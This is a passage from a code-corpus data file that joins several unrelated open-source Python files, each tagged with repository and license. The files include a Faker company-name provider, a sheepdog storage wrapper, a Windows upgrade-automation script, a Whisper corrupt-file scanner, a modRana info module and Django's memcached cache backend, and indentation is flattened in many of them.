"{{company_prefix}}{{last_name}}{{company_category}}",
"{{last_name}}{{company_category}}{{company_prefix}}",
)
company_prefixes = ("株式会社", "有限会社", "合同会社")
company_categories = (
"水産",
"農林",
"鉱業",
"建設",
"食品",
"印刷",
"電気",
"ガス",
"情報",
"通信",
"運輸",
"銀行",
"保険",
)
def company_prefix(self) -> str:
return self.random_element(self.company_prefixes)
def company_category(self) -> str:
return self.random_element(self.company_categories)
| joke2k/faker | faker/providers/company/ja_JP/__init__.py | Python | mit | 762 |
from re import search, sub, match
from os.path import join
#
import s2gc
import s2gd
#
###########################
# LAMBDA FUNCTIONS ########
###########################
# match a certain expression at start of string
match_start = lambda expr,line: match(r'\s*(%s)[^a-zA-Z0-9]'%expr,line)
# ----------
# RECONSIDER
# ----------
# strip unwanted delimiters from string
strip_d = lambda s,d: sub(d,'',s)
# get first argument (cf getfargs)
getarg1 = lambda l: strip_d(get_fargs(l)[0],'\'')
# get next arg
getnextarg = lambda lst: lst.pop(0).lower().strip('\'')
getnextargNL = lambda lst: lst.pop(0).strip('\'')
#
###########################
# FUNCTIONS ###############
###########################
#
# # +++++++++++++++++++++++++++++++++++++++++
# # GET FARGS :
# # get arguments of function str
# #
# # <in>: string like plot(x,y,'linewidth',2.0)
# # <out>: list of arguments ['x','y','linewidth','2.0']
def get_fargs(l):
cur_stack = search(r'^\s*(?:\w+)\(\s*(.*)',l).group(1)
arg_list,cur_arg = [],''
prev_char = ''
while cur_stack:
cur_char = cur_stack[0]
is_open = cur_char in s2gd.keyopen
#
if is_open:
cur_arg += cur_char
closed_s,rest,f = find_delim(cur_stack[1:],cur_char,s2gd.keyclose[cur_char])
if f: raise s2gc.S2GSyntaxError(l,'<::found %s but could not close it::>'%cur_char)
cur_arg += closed_s+s2gd.keyclose[cur_char]
cur_stack = rest
continue
# transpose/string ambiguity: it's a string opener if after a comma or a space otherwise transpose
if cur_char == '\'' and (match(r'[\s,\']',prev_char) or prev_char==''):
cur_arg += '' if match(r'\'',prev_char) else '\'' # merging 'son''s' to 'son's'
closed_s,rest,f = find_delim(cur_stack[1:],'\'','\'')
if f: raise s2gc.S2GSyntaxError(l,'<::found %s but could not close it::>'%cur_char)
cur_arg += closed_s+'\''
cur_stack = rest
prev_char = ''
continue
# end of patterns: either split, break or get next char
elif cur_char == ',': # splitting comma
arg_list.append(cur_arg)
cur_arg,cur_stack,prev_char = '', cur_stack[1:].strip(),''
if not cur_stack:
raise s2gc.S2GSyntaxError(l,'<::misplaced comma::>')
elif cur_char == ')':
arg_list.append(cur_arg)
break
else:
cur_arg += cur_char
cur_stack = cur_stack[1:] # can throw syntax error (no end parens)
prev_char = cur_char
#
return arg_list
#
# Side function
def find_delim(s,d_open,d_close):
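    # Scan s for the delimiter that closes an already-opened d_open, honouring nesting.
    # Returns (captured text, remaining text, number of still-open delimiters; 0 means closed).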
cur_idx = 0
inside_open = 1
cur_string = ''
while cur_idx < len(s):
cur_char = s[cur_idx]
cur_idx += 1
#
if cur_char == d_close: inside_open -= 1
elif cur_char == d_open: inside_open += 1
#
if not inside_open: break
else: cur_string += cur_char
#
return cur_string,'' if cur_idx==len(s) else s[cur_idx:],inside_open
#
# +++++++++++++++++++++++++++++++++++++++++++
# SAFE_POP
# tries to pop list, if error, return clarifying
# message
def safe_pop(lst,lbl=''):
try:
return lst.pop(0)
except IndexError,e:
        raise s2gc.S2GSyntaxError(lbl,'<::found %s but no value(s)?::>'%lbl)
#
# +++++++++++++++++++++++++++++++++++++++++++
# ARRAY X
# extract numbers in array string '[a b c]'
#
# <in>: string like '[2.0 -2,3]'
# <out>: numbers ['2.0','-2','3']
# <rmk>: does not interpret expressions
def array_x(s):
array = []
# strip ends (-[-stuff-]- extract stuff)
core = match(r'(\s*\[?)([^\[^\]]+)(\]?\s*)',s).group(2)
# replace ',' by space
left = sub(',',' ',core)
# ATTEMPT - if sequence
nc = left.count(':')
if nc==1: # 1:5
spl = match(r'(^[^:]+):([^:]+$)',left);
first,last = float(spl.group(1)), float(spl.group(2))
seq,cur = [str(first)], first
while cur<=last-1:
cur+=1
seq.append(str(cur))
array = seq
elif nc==2:
spl = match(r'(^[^:]+):([^:]+):([^:]+$)',left)
first,step,last = float(spl.group(1)), float(spl.group(2)), float(spl.group(3))
seq,cur = [str(first)],first
while cur<=last-step:
cur+=step
seq.append(str(cur))
array = seq
else:
array = left.split(' ')
return [sub(' ','',e) for e in array]
#
# +++++++++++++++++++++++++++++++++++++++++++
# GET COLOR:
# (internal) read a 'color' option and
# return something in GLE format
def get_color(optstack):
#!<DEV:EXPR>
opt = getnextarg(optstack)
color = ''
a = 0
# option given form [r,g,b,a?]
rgbsearch = search(r'\[\s*([0-9]+\.?[0-9]*|\.[0-9]*)\s*[,\s]\s*([0-9]+\.?[0-9]*|\.[0-9]*)\s*[,\s]\s*([0-9]+\.?[0-9]*|\.[0-9]*)(.*)',opt)
if rgbsearch:
r,g,b = rgbsearch.group(1,2,3)
alphasearch = search(r'([0-9]+\.?[0-9]*|\.[0-9]*)',rgbsearch.group(4))
a = '1' if not alphasearch else alphasearch.group(1)
color = 'rgba(%s,%s,%s,%s)'%(r,g,b,a)
# option is x11 name + 'alpha'
elif optstack and optstack[0].lower().strip('\'')=='alpha':
optstack.pop(0)
opta = getnextarg(optstack)
# col -> rgba (using svg2rgb dictionary see s2gd.srd)
r,g,b = s2gd.srd.get(opt,(128,128,128))
a = round(float(opta)*100)
color = 'rgba255(%i,%i,%i,%2.1f)'%(r,g,b,a)
else: # just colname
color = opt
# if in matlab format (otherwise x11 name)
if color in ['r','g','b','c','m','y','k','w']:
color = s2gd.md[color]
trsp = False if a==0 or a=='1' else True
return color,trsp,optstack
#
# +++++++++++++++++++++++++++++++++++++++++++
def close_ellipsis(l,script_stack):
# gather lines in case continuation (...)
regex = r'(.*?)(?:\.\.\.\s*(?:%s.*)?$)'%s2gd.csd['comment']
srch_cl = search(regex,l)
if srch_cl:
line_open = True
nloops = 0
l = srch_cl.group(1)
while line_open and nloops<100:
nloops += 1
lt = script_stack.pop(0)
srch_cl = search(regex,lt)
if srch_cl:
l += srch_cl.group(1)
else:
line_open = False
l+=lt
if line_open:
raise s2gc.S2GSyntaxError(l,'<::line not closed::>')
return l, script_stack
| tlienart/script2gle | s2gf.py | Python | mit | 5,785 |
# Copyright (C) 2015 China Mobile Inc.
#
# zhangsong <[email protected]>
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License version
#2 as published by the Free Software Foundation.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
A python wrapper of sheepdog client c library libsheepdog.so .
"""
from ctypes import *
errlist = [
"Success", #errcode : 0
"Unknown error", #errcode : 1
"No object found", #errcode : 2
"I/O error", #errcode : 3
"VDI exists already", #errcode : 4
"Invalid parameters", #errcode : 5
"System error", #errcode : 6
"VDI is already locked", #errcode : 7
"No VDI found", #errcode : 8
"No base VDI found", #errcode : 9
"Failed to read from requested VDI", #errcode : 10
"Failed to write to requested VDI", #errcode : 11
"Failed to read from base VDI", #errcode : 12
"Failed to write to base VDI", #errcode : 13
"Failed to find requested tag", #errcode : 14
"System is still booting", #errcode : 15
"VDI is not locked", #errcode : 16
"System is shutting down", #errcode : 17
"Out of memory on server", #errcode : 18
"Maximum number of VDIs reached", #errcode : 19
"Protocol version mismatch", #errcode : 20
"Server has no space for new objects", #errcode : 21
"Waiting for cluster to be formatted", #errcode : 22
"Waiting for other nodes to join cluster", #errcode : 23
"Node has failed to join cluster", #errcode : 24
"IO has halted as there are not enough living nodes", #errcode : 25
"Object is read-only", #errcode : 26
"reserved", #errcode : 27
"reserved", #errcode : 28
"Inode object is invalidated" #errcode : 29
]
class SheepdogException(Exception):
pass
def err_handle(errcode):
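    # Translate a sheepdog error code into its message and raise SheepdogException;
    # out-of-range or reserved codes raise a generic 'Unexpected error.'.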
if (not ( 0<=errcode and errcode<len(errlist) ) ) or errlist[errcode]== 'reserved':
raise SheepdogException('Unexpected error.')
else:
raise SheepdogException(errlist[errcode])
libshared = cdll.LoadLibrary("libsheepdog.so")
sd_connect = libshared.sd_connect
sd_connect.argtypes = [c_char_p]
sd_connect.restype = c_void_p
sd_disconnect = libshared.sd_disconnect
sd_disconnect.argtypes = [c_void_p]
sd_disconnect.restype = c_int
sd_vdi_create = libshared.sd_vdi_create
sd_vdi_create.argtypes = [c_void_p, c_char_p, c_ulonglong]
sd_vdi_create.restype = c_int
sd_vdi_delete = libshared.sd_vdi_delete
sd_vdi_delete.argtypes = [c_void_p, c_char_p, c_char_p]
sd_vdi_delete.restype = c_int
sd_vdi_open = libshared.sd_vdi_open
sd_vdi_open.argtypes = [c_void_p, c_char_p, c_char_p]
sd_vdi_open.restype = c_void_p
sd_vdi_close = libshared.sd_vdi_close
sd_vdi_close.argtypes = [c_void_p]
sd_vdi_close.restype = c_int
sd_vdi_read = libshared.sd_vdi_read
sd_vdi_read.argtypes = [c_void_p, c_void_p, c_ulonglong, c_ulonglong]
sd_vdi_read.restype = c_int
sd_vdi_write = libshared.sd_vdi_write
sd_vdi_write.argtypes = [c_void_p, c_void_p, c_ulonglong, c_ulonglong]
sd_vdi_write.restype = c_int
sd_vdi_snapshot = libshared.sd_vdi_snapshot
sd_vdi_snapshot.argtypes = [c_void_p, c_char_p, c_char_p]
sd_vdi_snapshot.restype = c_int
sd_vdi_clone = libshared.sd_vdi_clone
sd_vdi_clone.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p]
sd_vdi_clone.restype = c_int
sd_vdi_getsize = libshared.sd_vdi_getsize
sd_vdi_getsize.argtypes = [c_void_p]
sd_vdi_getsize.restype = c_ulong
sd_vdi_resize = libshared.sd_vdi_resize
sd_vdi_resize.argtypes = [c_void_p, c_char_p, c_ulong]
sd_vdi_resize.restype = c_int
class sheepdog_driver():
'''the sheepdog driver class.
@connection: a connection to the sheepdog server.
:each method of the class may raise a SheepdogException.
'''
def __init__(self, connection):
self.connection = connection
    '''Disconnect from the sheepdog cluster.'''
def disconnect(self):
err_code = sd_disconnect(self.connection)
if err_code != 0:
err_handle(err_code)
    '''Create a logical volume in the sheepdog cluster.
@name: the name of the volume to be created.
@size: the size(Byte) of the volume to be created.
'''
def create(self, name, size):
err_code = sd_vdi_create(self.connection, name, size)
if err_code != 0:
err_handle(err_code)
    '''Delete a logical volume in the sheepdog cluster.
    @name: the name of the volume to be deleted.
    @tag: the snapshot tag of the volume; to delete a volume (not a snapshot), set tag to NULL.
    A volume can have many snapshots; the tag identifies a specific snapshot.
'''
def delete(self, name, tag):
err_code = sd_vdi_delete(self.connection, name, tag)
if err_code != 0:
err_handle(err_code)
'''Open the named volume.
@name: the name of the volume to be opened.
    @tag: snapshot tag of the volume to be opened; if the volume is not a snapshot, set tag to NULL.
    :returns: the volume descriptor.
'''
def open(self, name, tag):
vd = sd_vdi_open(self.connection, name, tag)
if vd ==None:
raise SheepdogException('open specified volume name:%s tag:%s error.'%(name,tag))
return vd
    '''Close the volume that the given volume descriptor points to.
    @vd: the volume descriptor.
'''
def close(self, vd):
err_code = sd_vdi_close(vd)
if err_code != 0:
err_handle(err_code)
'''Read from a volume at a given offset.
    @vd: the volume descriptor.
@size: how many bytes we want to read.
@offset: the start of the volume we try to read.
:returns: the read data.
'''
def read(self, vd, size, offset):
buffer = create_string_buffer(size)
err_code = sd_vdi_read(vd, buffer, size, offset)
if err_code != 0:
err_handle(err_code)
return buffer.raw
'''Write data to a volume at a given offset.
    @vd: the volume descriptor.
@size: how many bytes we want to write.
@offset: the start of the volume we try to write.
@data: the data to be write.
'''
def write(self, vd, data, size, offset):
err_code = sd_vdi_write(vd, data, size, offset)
if err_code != 0:
err_handle(err_code)
'''Take a snapshot of a volume.
@name: the name of the volume to snapshot
@tag: specify a tag of the snapshot
'''
def snapshot(self, name, tag):
err_code = sd_vdi_snapshot(self.connection, name, tag)
if err_code != 0:
err_handle(err_code)
''' Clone a new volume from a snapshot.
@srcname: the source volume name.
@srctag: the source tag of the snapshot.
@dstname: the destination volume name.
    :Only snapshots can be cloned.
'''
def clone(self, srcname, srctag, dstname):
err_code = sd_vdi_clone(self.connection, srcname, srctag, dstname)
if err_code != 0:
err_handle(err_code)
def getsize(self, vd):
return sd_vdi_getsize(vd)
def resize(self, name, new_size):
err_code = sd_vdi_resize(self.connection, name, new_size)
if (err_code != 0):
err_handle(err_code)
'''Connect to the Sheepdog cluster.
    @server_host: the sheepdog server, a combination of IP and port; default value is '127.0.0.1:7000'.
    :returns: an object of sheepdog_driver.
    :a SheepdogException will be raised if the connection fails.
'''
def connect(server_host='127.0.0.1:7000'):
connection = sd_connect(server_host)
if connection == None:
raise SheepdogException('connect to sheepdog server %s error.'%server_host)
return sheepdog_driver(connection)
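# Minimal usage sketch (illustrative only; assumes a sheep daemon listening on the
# default 127.0.0.1:7000 and that the volume name used here does not already exist):
#
#   driver = connect()
#   driver.create('test_vol', 16 * 1024 * 1024)    # 16 MiB logical volume
#   vd = driver.open('test_vol', None)
#   driver.write(vd, 'hello', 5, 0)
#   print(driver.read(vd, 5, 0))
#   driver.close(vd)
#   driver.delete('test_vol', None)
#   driver.disconnect()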
| liuy/sheepdog-ng | lib/shared/sheepdog.py | Python | gpl-2.0 | 7,707 |
#encoding=utf-8
__author__ = 'yang'
import jieba
import sys
reload(sys)
sys.setdefaultencoding('utf8')
def application(environ, start_response):
start_response('200 OK', [('Content-Type', 'text/plain')])
body = environ['PATH_INFO'][1:]
l = jieba.cut(body,cut_all=False)
r = '--'.join(l)
return [r.encode('utf-8')]
| ningmo/pynote | fenci/fenci.py | Python | agpl-3.0 | 339 |
import array
import ctypes
import os
import struct
import sys
import win32api
import win32con
import win32gui
import pywinauto
from pytank.Elements import ComboBox, Edit, getListboxItems, ListView, SendKeys, Control, findControls, RightClickMenu, ListBox
from pytank.Applications import *
from pytank.Buttons import *
from pytank.SystemFunctions import sleep, Type, Press, Ping
ControllerIPAddress = '192.168.10.55'
while True:
if Ping(ControllerIPAddress):
print 'Found'
sleep(10)
break
else:
pass
list = os.listdir("C:\\updates")
list.sort(reverse=True)
string = "C:\\updates\\" + str(list[0])
os.startfile(string)
gUpgrade_selectthesystemyouwouldliketoupgrade.Wait(3000)
sleep(10)
ListBox.Select(gUpgrade.GetHandle(),'SC F8-57-2E-00-00-EA')
gUpgrade.Focus()
sleep(5)
Control.Click(gUpgrade.GetHandle(),'Start')
Control.Click(HLUPGRADE.GetHandle(),'Yes')
sleep(10)
BACKUP_systemversion.WaitVanish()
sleep(10)
Upgrading_totalprogress.WaitVanish()
HLUPGRADE_softwareupdateonsystemcontrollercomplete.Wait(30)
Control.Click(HLUPGRADE.GetHandle(),'OK')
sleep(10) | kenshay/ImageScript | ProgramData/SystemFiles/Python/Lib/site-packages/elan/__OLD_SCRIPTS/runnner_Upgrade.py | Python | gpl-3.0 | 1,481 |
#!/usr/bin/env python
# encoding: utf-8
"""Find and (optionally) delete corrupt Whisper data files"""
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import os
import sys
import whisper
def walk_dir(base_dir, delete_corrupt=False, verbose=False):
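    """Recursively scan base_dir for .wsp files, reporting corrupt ones and
    optionally deleting them."""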
for dirpath, dirnames, filenames in os.walk(base_dir):
if verbose:
            print("Scanning %s…" % dirpath)
whisper_files = (os.path.join(dirpath, i) for i in filenames if i.endswith('.wsp'))
for f in whisper_files:
try:
info = whisper.info(f)
except whisper.CorruptWhisperFile:
if delete_corrupt:
print('Deleting corrupt Whisper file: %s' % f, file=sys.stderr)
os.unlink(f)
else:
print('Corrupt Whisper file: %s' % f, file=sys.stderr)
continue
if verbose:
print('%s: %d points' % (f, sum(i['points'] for i in info.get('archives', {}))))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=__doc__.strip())
parser.add_argument('--delete-corrupt', default=False, action='store_true',
help='Delete reported files')
parser.add_argument('--verbose', default=False, action='store_true',
help='Display progress info')
parser.add_argument('directories', type=str, nargs='+',
metavar='WHISPER_DIR',
help='Directory containing Whisper files')
args = parser.parse_args()
for d in args.directories:
d = os.path.realpath(d)
if not os.path.isdir(d):
            parser.error("%s is not a directory!" % d)
walk_dir(d, delete_corrupt=args.delete_corrupt, verbose=args.verbose)
| kerlandsson/whisper | bin/find-corrupt-whisper-files.py | Python | apache-2.0 | 1,830 |
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 1024 , FREQ = 'D', seed = 0, trendtype = "LinearTrend", cycle_length = 5, transform = "Quantization", sigma = 0.0, exog_count = 20, ar_order = 0); | antoinecarme/pyaf | tests/artificial/transf_Quantization/trend_LinearTrend/cycle_5/ar_/test_artificial_1024_Quantization_LinearTrend_5__20.py | Python | bsd-3-clause | 270 |
# -*- coding: utf-8 -*-
#----------------------------------------------------------------------------
# A modRana module providing various kinds of information.
#----------------------------------------------------------------------------
# Copyright 2007, Oliver White
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#---------------------------------------------------------------------------
from modules.base_module import RanaModule
from core.point import Point
import math
from core import geo
def getModule(*args, **kwargs):
return Info(*args, **kwargs)
class Info(RanaModule):
"""A modRana information handling module"""
def __init__(self, *args, **kwargs):
RanaModule.__init__(self, *args, **kwargs)
self.versionString = "unknown version"
currentVersionString = self.modrana.paths.getVersionString()
if currentVersionString is not None:
# check version string validity
self.versionString = currentVersionString
self._dirPoint = None
dirPoint = self.get("directionPointLatLon", None)
if dirPoint:
lat, lon = dirPoint
self._dirPoint = Point(lat, lon)
def getPayPalUrl(self):
return "https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=martin%2ekolman%40gmail%2ecom&lc=CZ&item_name=The%20modRana%20project¤cy_code=EUR&bn=PP%2dDonationsBF%3abtn_donate_LG%2egif%3aNonHosted"
def getFlattrUrl(self):
return "https://flattr.com/thing/678708/modRana-flexible-GPS-navigation-system"
def getGratipayUrl(self):
return "https://gratipay.com/M4rtinK"
def getBitcoinAddress(self):
return "14DXzkqqYCfSG5vZNYPnPiZzg3wW2hXsE8"
def getDiscussionUrls(self):
"""
return a list of modRana-relevant discussions, with the most relevant discussion on top
"""
return [("http://talk.maemo.org/showthread.php?t=58861", "talk.maemo.org thread")]
def getMainDiscussionUrl(self):
"""
return Url to the most relevant modRana discussion
"""
return self.getDiscussionUrls()[0]
def getWebsiteUrl(self):
"""
return Url to the modRana website
"""
return "http://www.modrana.org"
def getSourceRepositoryUrl(self):
return "https://github.com/M4rtinK/modrana"
def getEmailAddress(self):
"""
return the project email address
"""
return "[email protected]"
def getAboutText(self):
www = self.getWebsiteUrl()
email = self.getEmailAddress()
source = self.getSourceRepositoryUrl()
discussion, name = self.getDiscussionUrls()[0]
text = "<p><b>main developer:</b> Martin Kolman</p>"
text += '<p><b>email</b>: <a href="mailto:%s">%s</a></p>' % (email, email)
text += '<p><b>www</b>: <a href="%s">%s</a></p>' % (www, www)
text += '<p><b>source</b>:\n<a href="%s">%s</a></p>' % (source, source)
text += '<p><b>discussion</b>: check <a href="%s">%s</a></p>' % (discussion, name)
return text
def drawMenu(self, cr, menuName, args=None):
if menuName == 'infoAbout':
menus = self.m.get('menu', None)
if menus:
button1 = ('Discussion', 'generic', "ms:menu:openUrl:%s" % self.getDiscussionUrls()[0][0])
button2 = ('Donate', 'generic', "ms:menu:openUrl:%s" % self.getPayPalUrl())
web = " <u>www.modrana.org</u> "
email = " [email protected] "
text = "modRana version:\n\n%s\n\n\n\nFor questions or feedback,\n\ncontact the <b>modRana</b> project:\n\n%s\n\n%s\n\n" % (
self.versionString, web, email)
box = (text, "ms:menu:openUrl:http://www.modrana.org")
menus.drawThreePlusOneMenu(cr, 'infoAbout', 'set:menu:info', button1, button2, box)
elif menuName == "infoDirection":
menus = self.m.get('menu', None)
if menus:
button1 = ('set point', 'generic', "info:setPoint")
button2 = ('clear', 'generic', "info:clearPoint")
boxText = "no point selected"
if self._dirPoint:
lat = self._dirPoint.lat
lon = self._dirPoint.lon
boxText= "lat: <b>%f</b> lon: <b>%f</b>" % (lat, lon)
# if possible, add distance information
units = self.m.get("units", None)
pos = self.get("pos", None)
if pos and units:
lat1, lon1 = pos
distance = geo.distance(lat, lon, lat1, lon1)*1000
distance, shortUnit, longUnit = units.humanRound(distance)
boxText+=" %s %s" % (str(distance), shortUnit)
box = (boxText, "")
# draw the buttons and main box background
menus.drawThreePlusOneMenu(cr, 'infoDirection', 'set:menu:info', button1, button2, box)
# get coordinates for the box
(e1, e2, e3, e4, alloc) = menus.threePlusOneMenuCoords()
# upper left corner XY
(x4, y4) = e4
# width and height
(w, h, dx, dy) = alloc
w4 = w - x4
h4 = h - y4
# draw the direction indicator
axisX = x4 + w4/2.0
axisY = y4 + h4/2.0
# shortest side
shortestSide = min(w4,h4)
# usable side - 10% border
side = shortestSide*0.7
angle = self._getDirectionAngle()
self._drawDirectionIndicator(cr, axisX, axisY, side, angle)
def handleMessage(self, message, messageType, args):
if message == "setPoint":
# open the coordinates entry dialog
entry = self.m.get('textEntry', None)
if entry:
initialText = ""
dirPoint = self.get("directionPointLatLon", None)
if dirPoint:
initialText = "%f,%f" % dirPoint
entry.entryBox(self, 'directionPointCoordinates', 'Coordinates (Example: 1.23,4.56)', initialText=initialText)
elif message == "clearPoint":
self._dirPoint = None
            self.set("directionPointLatLon", None)
def handleTextEntryResult(self, key, result):
if key == 'directionPointCoordinates':
try:
lat, lon = result.split(",")
lat = float(lat)
lon = float(lon)
self.log.info("Direction coordinates %f,%f", lat, lon)
self._dirPoint = Point(lat, lon)
self.set("directionPointLatLon", (lat, lon))
except Exception:
self.log.exception("direction point coordinate parsing failed")
# from SGTL
# TODO: move to appropriate place
def _bearingTo(self, pos, target, currentBearing):
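        """Return the relative bearing (degrees, 0-360) from pos to target,
        taking the current heading into account; used to rotate the on-screen
        direction indicator."""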
lat1 = math.radians(pos.lat)
lat2 = math.radians(target.lat)
lon1 = math.radians(pos.lon)
lon2 = math.radians(target.lon)
dlon = math.radians(target.lon - pos.lon)
y = math.sin(dlon) * math.cos(lat2)
x = math.cos(lat1) * math.sin(lat2) - math.sin(lat1)*math.cos(lat2)*math.cos(dlon)
bearing = math.degrees(math.atan2(y, x))
bearing = (-180 + currentBearing - bearing) % 360
return bearing
def _getDirectionAngle(self):
angle = 0.0
pos = self.get("pos", None)
bearing = self.get("bearing", None)
if pos and bearing is not None and self._dirPoint:
lat, lon = pos
posPoint = Point(lat, lon)
angle = self._bearingTo(posPoint, self._dirPoint, bearing)
return angle
def _drawDirectionIndicator(self, cr, x1, y1, side, angle):
# looks like some of the menu drawing functions does not
# call stroke() at the end of drawing
# TODO: find which one is it and remove stroke() from here
cr.stroke()
cr.set_source_rgb(1.0, 1.0, 0.0)
cr.save()
cr.translate(x1, y1)
cr.rotate(math.radians(angle))
# inside area
cr.move_to(0, side/2.0) # tip of the arrow
cr.line_to(-side/3.0, -side/2.0) # left extreme
cr.line_to(0, -side/5.0) # arrow inset
cr.line_to(side/3.0, -side/2.0) # right extreme
cr.fill()
cr.set_source_rgb(0.0, 0.0, 0.0)
cr.set_line_width(6)
cr.move_to(0, side/2.0) # tip of the arrow
cr.line_to(-side/3.0, -side/2.0) # left extreme
cr.line_to(0, -side/5.0) # arrow inset
cr.line_to(side/3.0, -side/2.0) # right extreme
cr.close_path()
cr.stroke()
# draw middle indicator
cr.set_source_rgb(0.0, 0.0, 0.0)
cr.arc(0, 0, 16, 0, 2.0 * math.pi)
cr.fill()
cr.restore()
#
#cr.set_source_rgb(1.0, 1.0, 0.0)
#cr.save()
#cr.translate(x1, y1)
#cr.rotate(math.radians(angle))
#cr.move_to(-10, 15)
#cr.line_to(10, 15)
#cr.line_to(0, -15)
#cr.fill()
#cr.set_source_rgb(0.0, 0.0, 0.0)
#cr.set_line_width(3)
#cr.move_to(-10, 15)
#cr.line_to(10, 15)
#cr.line_to(0, -15)
#cr.close_path()
#cr.stroke()
#cr.restore() | ryfx/modrana | modules/mod_info.py | Python | gpl-3.0 | 10,055 |
"Memcached cache backend"
import pickle
import re
import time
from django.core.cache.backends.base import DEFAULT_TIMEOUT, BaseCache
from django.utils.functional import cached_property
class BaseMemcachedCache(BaseCache):
def __init__(self, server, params, library, value_not_found_exception):
super().__init__(params)
if isinstance(server, str):
self._servers = re.split('[;,]', server)
else:
self._servers = server
# The exception type to catch from the underlying library for a key
# that was not found. This is a ValueError for python-memcache,
# pylibmc.NotFound for pylibmc, and cmemcache will return None without
# raising an exception.
self.LibraryValueNotFoundException = value_not_found_exception
self._lib = library
self._options = params.get('OPTIONS') or {}
@property
def _cache(self):
"""
Implement transparent thread-safe access to a memcached client.
"""
if getattr(self, '_client', None) is None:
self._client = self._lib.Client(self._servers, **self._options)
return self._client
def get_backend_timeout(self, timeout=DEFAULT_TIMEOUT):
"""
Memcached deals with long (> 30 days) timeouts in a special
way. Call this function to obtain a safe value for your timeout.
"""
if timeout == DEFAULT_TIMEOUT:
timeout = self.default_timeout
if timeout is None:
# Using 0 in memcache sets a non-expiring timeout.
return 0
elif int(timeout) == 0:
# Other cache backends treat 0 as set-and-expire. To achieve this
# in memcache backends, a negative timeout must be passed.
timeout = -1
if timeout > 2592000: # 60*60*24*30, 30 days
# See https://github.com/memcached/memcached/wiki/Programming#expiration
# "Expiration times can be set from 0, meaning "never expire", to
# 30 days. Any time higher than 30 days is interpreted as a Unix
# timestamp date. If you want to expire an object on January 1st of
# next year, this is how you do that."
#
# This means that we have to switch to absolute timestamps.
timeout += int(time.time())
return int(timeout)
def add(self, key, value, timeout=DEFAULT_TIMEOUT, version=None):
key = self.make_key(key, version=version)
return self._cache.add(key, value, self.get_backend_timeout(timeout))
def get(self, key, default=None, version=None):
key = self.make_key(key, version=version)
return self._cache.get(key, default)
def set(self, key, value, timeout=DEFAULT_TIMEOUT, version=None):
key = self.make_key(key, version=version)
if not self._cache.set(key, value, self.get_backend_timeout(timeout)):
# make sure the key doesn't keep its old value in case of failure to set (memcached's 1MB limit)
self._cache.delete(key)
def delete(self, key, version=None):
key = self.make_key(key, version=version)
return bool(self._cache.delete(key))
def get_many(self, keys, version=None):
key_map = {self.make_key(key, version=version): key for key in keys}
ret = self._cache.get_multi(key_map.keys())
return {key_map[k]: v for k, v in ret.items()}
def close(self, **kwargs):
# Many clients don't clean up connections properly.
self._cache.disconnect_all()
def incr(self, key, delta=1, version=None):
key = self.make_key(key, version=version)
# memcached doesn't support a negative delta
if delta < 0:
return self._cache.decr(key, -delta)
try:
val = self._cache.incr(key, delta)
# python-memcache responds to incr on nonexistent keys by
# raising a ValueError, pylibmc by raising a pylibmc.NotFound
# and Cmemcache returns None. In all cases,
# we should raise a ValueError though.
except self.LibraryValueNotFoundException:
val = None
if val is None:
raise ValueError("Key '%s' not found" % key)
return val
def decr(self, key, delta=1, version=None):
key = self.make_key(key, version=version)
# memcached doesn't support a negative delta
if delta < 0:
return self._cache.incr(key, -delta)
try:
val = self._cache.decr(key, delta)
# python-memcache responds to incr on nonexistent keys by
# raising a ValueError, pylibmc by raising a pylibmc.NotFound
# and Cmemcache returns None. In all cases,
# we should raise a ValueError though.
except self.LibraryValueNotFoundException:
val = None
if val is None:
raise ValueError("Key '%s' not found" % key)
return val
def set_many(self, data, timeout=DEFAULT_TIMEOUT, version=None):
safe_data = {}
original_keys = {}
for key, value in data.items():
safe_key = self.make_key(key, version=version)
safe_data[safe_key] = value
original_keys[safe_key] = key
failed_keys = self._cache.set_multi(safe_data, self.get_backend_timeout(timeout))
return [original_keys[k] for k in failed_keys]
def delete_many(self, keys, version=None):
self._cache.delete_multi(self.make_key(key, version=version) for key in keys)
def clear(self):
self._cache.flush_all()
class MemcachedCache(BaseMemcachedCache):
"An implementation of a cache binding using python-memcached"
def __init__(self, server, params):
import memcache
super().__init__(server, params, library=memcache, value_not_found_exception=ValueError)
@property
def _cache(self):
if getattr(self, '_client', None) is None:
client_kwargs = {'pickleProtocol': pickle.HIGHEST_PROTOCOL}
client_kwargs.update(self._options)
self._client = self._lib.Client(self._servers, **client_kwargs)
return self._client
def touch(self, key, timeout=DEFAULT_TIMEOUT, version=None):
key = self.make_key(key, version=version)
return self._cache.touch(key, self.get_backend_timeout(timeout)) != 0
def get(self, key, default=None, version=None):
key = self.make_key(key, version=version)
val = self._cache.get(key)
# python-memcached doesn't support default values in get().
# https://github.com/linsomniac/python-memcached/issues/159
# Remove this method if that issue is fixed.
if val is None:
return default
return val
def delete(self, key, version=None):
# python-memcached's delete() returns True when key doesn't exist.
# https://github.com/linsomniac/python-memcached/issues/170
# Call _deletetouch() without the NOT_FOUND in expected results.
key = self.make_key(key, version=version)
return bool(self._cache._deletetouch([b'DELETED'], 'delete', key))
class PyLibMCCache(BaseMemcachedCache):
"An implementation of a cache binding using pylibmc"
def __init__(self, server, params):
import pylibmc
super().__init__(server, params, library=pylibmc, value_not_found_exception=pylibmc.NotFound)
@cached_property
def _cache(self):
return self._lib.Client(self._servers, **self._options)
def touch(self, key, timeout=DEFAULT_TIMEOUT, version=None):
key = self.make_key(key, version=version)
if timeout == 0:
return self._cache.delete(key)
return self._cache.touch(key, self.get_backend_timeout(timeout))
def close(self, **kwargs):
# libmemcached manages its own connections. Don't call disconnect_all()
# as it resets the failover state and creates unnecessary reconnects.
pass
| theo-l/django | django/core/cache/backends/memcached.py | Python | bsd-3-clause | 7,977 |
